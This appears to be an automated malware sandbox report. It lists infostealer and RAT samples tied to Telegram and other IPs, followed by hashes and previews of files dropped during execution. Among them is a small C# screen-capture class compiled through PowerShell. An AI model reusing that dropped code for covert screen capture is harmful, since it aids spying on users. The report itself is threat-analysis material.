api.telegram.org	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	c9toH15OT0.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	9KEZfGRjyK.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	9KEZfGRjyK.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	PAYMENT ADVICE 750013-1012449943-81347-pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	66776676676.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	_Company.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	F.O Pump Istek,Docx.bat	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Vidar, Xmrig	Browse	149.154.167.99
	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, XWorm	Browse	149.154.167.220
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	https://l.facebook.com/l.php?u=https%3A%2F%2Ft.me%2FPAWSOG_bot%2FPAWS%3Fstartapp%3Dy6XarDUx%26fbclid%3DIwZXh0bgNhZW0CMTAAAR3IsDSVMcBgD-KKIyBXkOWfUkEFRcacr_vOCRRmviPmkFBUb89K461Xors_aem_phLdcKrpf4KWQzIltAO6sg&h=AT0WVJB1xqSKqrvz6oCyiCr2S_kisddMHHYmkei4Ws2sbL4pRphOmNE4PXT0dksI9PktkcW4m87_ll8cIS3t1M10038szd68S2XeJYojq6dQAb2PNvHsZFU9AcnVKku-Ww&__tn__=R%5D-R&c%5B0%5D=AT333mRdaoK-Yj4Ygf4lXueSR8jJ8CACMU4jPPhyx4Dd8BU65ez-7IWN-rjEtxmQ4vnelW50DVCFSTPJgFIJWEEx8TitUX4wIVY-t-NciHl77nL94VWL9IfsUrTxvCQB2zyPBhLoYnhspB5Xwyppb4fz5drOP91P-bJPoqSIEG9eoaQFOXaOYJeNVBj8A6jTCbgB-MXs3Mr2iqYLeO7DnF-q9v0FShLlwJK2Dtzfkv1OxBm45LKEAXAPoI199zlXmZpVMznj	Get hash	malicious	Unknown	Browse	149.154.167.99
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	ktyihkdfesf.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	pjthjsdjgjrtavv.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	c9toH15OT0.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	149.154.167.99
TUT-ASUS	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, XWorm	Browse	208.95.112.1
	dF66DKQP7u.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	fvbhdyuJYi.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	8DiSW8IPEF.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	twE44mm07j.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	YgJ5inWPQO.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	KJhsNv2RcI.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	gs7lQa4EuM.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	doc00290320092.jse	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3073555446953609
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvre:KooCEYhgYEL0In
MD5:	7F4295A05B08BBD9826ED19630197598
SHA1:	FBEAA42F4BC80705F88AFD17848B1D3877CA26F2
SHA-256:	4AEB775C800753F300CE65132BD5DE82A9B7FF5D3A32FA7DBA8015F33BB3D2BC
SHA-512:	3794C653610CC71CD03D6C1E9D7741206C0C21E61AFFB68C1D9A4EFA2C95373EC90FFC64F9FCB34A65F9DEA211ACF965D7395FECFB45CB4D2E98B38284EE726A
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xe78fdf00, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42210112512517145
Encrypted:	false
SSDEEP:	1536:JSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Jaza/vMUM2Uvz7DO
MD5:	AFCB4552DBFF35A87C5C399E26B009C5
SHA1:	A0D19B6B18126E1CBDB9F2C61BBFA0F564F5C81E
SHA-256:	B7FF8CC6F410A404423774EAAE3799BB5F79E0183C1D2929D6AC738784EC60FD
SHA-512:	7ABFF20C57D273E34AC1AF356A90AFB04A3677FA8CC9CEAD1B53370B4CE949F26A6D206EA05D8DABDB15F1C3BEF7D2505E233937E6B2D153329F7B41BB178BFB
Malicious:	false
Preview:	...... .......A.......X\...;...{......................0.!..........{A..9...\|7.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................hH)..9...\|W..................8..9...\|7..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07535261679757696
Encrypted:	false
SSDEEP:	3:5ilEYeH1Tjn13a/U0gchXallcVO/lnlZMxZNQl:5dzH1T53qU0gQeOewk
MD5:	2DD687215134497B2BB261ED410DBDD2
SHA1:	1B5252C6B070C7DB1B828A85A7C3469782E4A9C3
SHA-256:	4C9285B2D16EB6084482AE033AA591DDF46CC21BBB84A1588265BCEC49625B6E
SHA-512:	C2726FA05950F70B7049A18802D777258AA1607131784F59A7114000162F9A469AC23D9DC0C320EF3ED447EAD749999B081E33EB364433178764F1F430FA895B
Malicious:	false
Preview:	.{_......................................;...{...9...\|7......{A..............{A......{A..........{A].................8..9...\|7.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	280
Entropy (8bit):	0.7403664744478247
Encrypted:	false
SSDEEP:	3:FiWXlv9U:Lv
MD5:	99BBE027A67D5B8E84C910F7C77709D2
SHA1:	372EFA7431F8EECFC4247C810131CB6928E50AC3
SHA-256:	0F27051CF1DA3BBA983425A45ED2DE291E43491E0A982844D92C5B92AF34FCAE
SHA-512:	E3970DEFF941FE95016F731651C7C234FF4AD27B54317BE44B4292F050E2A4B9ACACFF103837ADFC94999F9B534098231204C26D9BBDF47412CFE09C50F77BE7
Malicious:	false
Preview:	sdPC......................5.y&.K.?....................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.01057775872642915
Encrypted:	false
SSDEEP:	3:MsFl:/F
MD5:	CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:	3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:	D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:	8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:	false
Preview:	............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	modified
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_2

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.011852361981932763
Encrypted:	false
SSDEEP:	3:MsHlDll:/H
MD5:	0962291D6D367570BEE5454721C17E11
SHA1:	59D10A893EF321A706A9255176761366115BEDCB
SHA-256:	EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:	F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_3

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.012340643231932763
Encrypted:	false
SSDEEP:	3:MsGl3ll:/y
MD5:	41876349CB12D6DB992F1309F22DF3F0
SHA1:	5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:	E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:	E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
Category:	dropped
Size (bytes):	262512
Entropy (8bit):	9.553120663130604E-4
Encrypted:	false
SSDEEP:	3:LsNl7Ul:Ls3Y
MD5:	B10161CBAC10E67E6B55C67D23CADA62
SHA1:	223B330BC5A834E512C36B81DAE7A21FD00EA0E0
SHA-256:	C9B433C726432997880992B9F2914D132B977A343CE31D67082D91A8A19A7523
SHA-512:	AF851E5652F2D51373AD3E3C1F86A7378EA5655A88EFBF0E010A38A7D0DE5D723A499221E3E1F7A469EE77E68A109FD0DEC1F0C00E6CA239CE7456FD7964C0A5
Malicious:	false
Preview:	.........................................\|..V./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0018090556708630736
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE/lX5k2K:/M/xT02z6
MD5:	CE0B8267AD4D9C71230ED14650161E0E
SHA1:	58063802C11AE5EC5366E02F8A98F9030879E4F6
SHA-256:	C735622E8F83A0A3A90F1F0C13C216EC6E665B3C797221F152BBD5798F6B6B97
SHA-512:	1200E0FB7AD42AA8DE9BD129A26829BC06A2854FFA82AC7C29FAF1A064F42C00BC910C75F056571F2EB8F1923CF9423436F9ED1F89DF93CC515396C1DF94C8AE
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.146136605610916
Encrypted:	false
SSDEEP:	6:NcOc+q2Pwkn2EsUKGd8a2jMGIFUt8KOBSZZmw+KOBSNVkwOwkn2EsUKGd8a2jMmd:NA+vYfEsUJ8EFUt8KuSZ/+KuSNV5JfE2
MD5:	346BDD5D37D280A8FEE7F0CF5A4BCA07
SHA1:	A743BAA21A77DDFC9A757E9E4033453BFD26D933
SHA-256:	5D4EA7FCECB0DCF4893182AFD91B10222EA887A5A7DB17B5F1177412E698DB33
SHA-512:	46DCEFD0880A93E987E1B11D1F1DC1FC5C4C3FB3F603BF819C7A9FD0B3F96A67CCD5B36F490080783756F7D5BD35E3271338631FCE5385086F288414F4D6BAA4
Malicious:	false
Preview:	2024/12/20-23:57:20.103 1ddc Reusing MANIFEST C:\Users\user\AppData\Local/Microsoft/Edge/User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/20-23:57:20.157 1ddc Recovering log #3.2024/12/20-23:57:20.157 1ddc Reusing old log C:\Users\user\AppData\Local/Microsoft/Edge/User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.146136605610916
Encrypted:	false
SSDEEP:	6:NcOc+q2Pwkn2EsUKGd8a2jMGIFUt8KOBSZZmw+KOBSNVkwOwkn2EsUKGd8a2jMmd:NA+vYfEsUJ8EFUt8KuSZ/+KuSNV5JfE2
MD5:	346BDD5D37D280A8FEE7F0CF5A4BCA07
SHA1:	A743BAA21A77DDFC9A757E9E4033453BFD26D933
SHA-256:	5D4EA7FCECB0DCF4893182AFD91B10222EA887A5A7DB17B5F1177412E698DB33
SHA-512:	46DCEFD0880A93E987E1B11D1F1DC1FC5C4C3FB3F603BF819C7A9FD0B3F96A67CCD5B36F490080783756F7D5BD35E3271338631FCE5385086F288414F4D6BAA4
Malicious:	false
Preview:	2024/12/20-23:57:20.103 1ddc Reusing MANIFEST C:\Users\user\AppData\Local/Microsoft/Edge/User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/20-23:57:20.157 1ddc Recovering log #3.2024/12/20-23:57:20.157 1ddc Reusing old log C:\Users\user\AppData\Local/Microsoft/Edge/User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\DevToolsActivePort

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	59
Entropy (8bit):	4.375967574962162
Encrypted:	false
SSDEEP:	3:3oRKSuytdNIXWtDTDn4:Ys5knftPL4
MD5:	883C9A86B0EDCB0F8CF84346EB70332D
SHA1:	5E23FC7727BEBB49D272BBEFE49B53D816B0F367
SHA-256:	4610E20E703C2016C1BFE0CDC823EBE8CE911F9E23190F780E8634D0D70A51B0
SHA-512:	07174535F747CF939785779BE2892A0444E6D1E1D06E9928A0FDD9804C780C06542421CBF939BC719B03D97F1658D0AB88A4C7203C06EFA91140A440244FEB5E
Malicious:	false
Preview:	2223./devtools/browser/9061386d-2f04-4ecd-b183-0f606898c8c4

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\ ? ? \Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	694763
Entropy (8bit):	7.925872501392444
Encrypted:	false
SSDEEP:	12288:2U9YNlrsDAL0YlKCsI4jx/NmRnuMhPbw5zZFQ+7W1ljA0Y:2f7r6AL0cP3WlU3tw3FQTjy
MD5:	92F98A488F422125CBE28A1292E9134F
SHA1:	2CD7EDD40E3F3040349E9259F4A2834AFEE81240
SHA-256:	D79B2B327378BD1916AF5890EAFBA578EF503C7202CE5FE085F4D2C01B857D88
SHA-512:	53684C88645DB342960268FECAED55AFE6D34A1BB7F23BFB0B0B4A0F8108D494E644248FD8404D064BDA94A7375B067C9587208571C7E2AED3FFF194808792E7
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.mU....v..I.s.w..XU......X...ZQe..Rr...d.`.....lD%H.1.XGK).$.U6.$... ...c......ko.[{Z...o.c......>F.s./...l...C.;%...O{..tO..:'.{X`.t.4:.....N.y/..C....&.\|..L.?M.........Wl.h.q.~ant>..91ulL.sO...yb..Y..HL.-..H........=.#.....5...k...4.C....CfO....L...?..S.yx~9....c1U....s....[.}.j........2.1..@..i.Y..#..L}.........5.?........<.E.S........E.S.Mys.....,z.`..'.Wj..u.@..3f..wd...fj..{ ...wf....+........"c.m.N.[Z........]us....j.[n....e....93..rK...a.P..%)O0f..>7V.7'...Z..S\|Q.k.T._.w..}R<...i......h<...ml..o......j.....K.=......{]_-yS..3..b.t....v....zM.....'..M..RLcA>.=o....e.]B,...%/.;;].../J.tw....J.-!..w..Z.k.....NWe.;^...qC.l..o.{...]....;\Yu.."..vL......./..;\...........%.\.Y.s.n....c~Y..K.._.....X..;...K{n.Y.10...).].O.?..%.E.^...=..h..3e...m.[..oui5..%..t.t..b.-.n.}.>,.&.k}.^..].MZ.u...O...Ly._\-."]7..)O.g..[.m..S...w6...nvQ..lza.)W..Z..z.

C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
Category:	dropped
Size (bytes):	607
Entropy (8bit):	5.342065897853088
Encrypted:	false
SSDEEP:	12:p37Lvkmb6KOkqe1xBkrk+ikOfVbbmWZEifVbb7:V3ka6KOkqeFkOf9Eifp
MD5:	C424023A1F49A39EE46CC55515517797
SHA1:	BD211A4FAA0BF73361A0E4ECA42086011F3D50B9
SHA-256:	9B9C39583CB074CD6E877D73B229F07ABFB57B9319AB37CD9DB08A2E059EB2F8
SHA-512:	14671B1A1312A3180E69BCB277122AEC8B047EB6C1E429799E11338B68B47DFBB939CCDECC6E96B2B03DFC07B172F54063CC807C2C3F900B9E17B1D9B48E94F6
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.0.cs"

C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.1633852575252934
Encrypted:	false
SSDEEP:	48:6D7oEAtf0KhzBU/9qf6mtJLN0k8pW1ulqa3Oq:9Nz09lmjOkasK
MD5:	5A9DF94C30A75B9E5B31D797654871AA
SHA1:	E59E91311011D85A8496B6D1A2EAC2C21E8F5BCE
SHA-256:	8F1D451521363B5AACAE1D686B0D39F038CA6D7166C1D78F769143D57FD87714
SHA-512:	9863356A3018EC57FFCD81D9D1439A67A2A0115BE38D16092D6EB4D284230E9175D563B042ABA0FBF41D71BD83AEBD27E6163032AEA2D1822FD1689CBF2B8695
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....`fg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1149
Entropy (8bit):	5.503612203252882
Encrypted:	false
SSDEEP:	24:KJfNlId3ka6KOkqeFkOf9EifsKax5DqBVKVrdFAMBJTH:uNlkka6NkqeFky9EusK2DcVKdBJj
MD5:	57FF9679419C4AE3C1BE128D8FBAB347
SHA1:	C623EF26B785336B2641E18308A7226C33160D96
SHA-256:	EED2534BCFD385C88F528ACE2E38C927B6BC20928970F6D60BB98C7273B73E94
SHA-512:	2756EFADA17461740F765C76D77FE580E24000B7D2EE3950F88C50DA74E107EEEF67B68CCE53622A4D73FAD86B1478CCFE960EFB981BD523ACC7251774CD6847
Malicious:	false
Reputation:	unknown
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\33ajg45c\33ajg45c.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe

C:\Users\user\AppData\Local\Temp\33ajg45c\CSCD665F1311EED4D7D921539AB761843.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1120994738967815
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry3sak7YnqqMhPN5Dlq5J:+RI+ycuZhNtsakSMhPNnqX
MD5:	FDC9F28D0085B9B036156A014DA24210
SHA1:	1BB2D76DCC5680A9DB21880FE8E9A12E00A46180
SHA-256:	5E839724DF5282E331416E79CBA5D49931274CE5073B0A30CC15A787FAC2A100
SHA-512:	C99A74DBDD02E95F46FC3C160A89526FBE4D86F4D89549F48B1E0A4F7671C6422B616CC0586D02ABAF847F5909862CB143D71A6B579B8654CC573494C67B300C
Malicious:	false
Reputation:	unknown
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.3.a.j.g.4.5.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.3.a.j.g.4.5.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
